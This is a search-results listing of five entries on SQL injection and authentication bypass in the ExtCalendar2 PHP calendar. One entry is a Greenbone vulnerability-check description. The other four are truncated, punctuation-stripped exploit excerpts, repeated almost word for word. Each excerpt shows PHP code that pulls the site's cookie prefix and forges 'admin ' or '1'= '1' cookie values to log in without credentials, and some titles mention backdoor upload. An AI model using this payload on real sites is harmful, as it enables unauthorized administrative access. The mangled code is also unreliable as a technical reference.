5 matches found
ExtCalendar2 SQL Injection and Authentication Bypass Vulnerabilities
This host is ExtCalendar2 and is prone to sql injection and authentication bypass vulnerabilities. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...
ExtCalendar2 SQL Injection / Authentcation Bypass
ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking for logout echo eregi"logout", DzCURL$target,0,$header ? " Log...
ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload
ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking for logout echo eregi"logout", DzCURL$target,0,$header ? " Log...
ExtCalendar2 - Cookie Authentication Bypass Backdoor Upload
ExtCalendar2 - Cookie Authentication Bypass Backdoor Upload ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking fo...
ExtCalendar2 (Auth Bypass/Cookie) SQL Injection Vulnerability
Exploit for php platform in category web applications ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking for logo...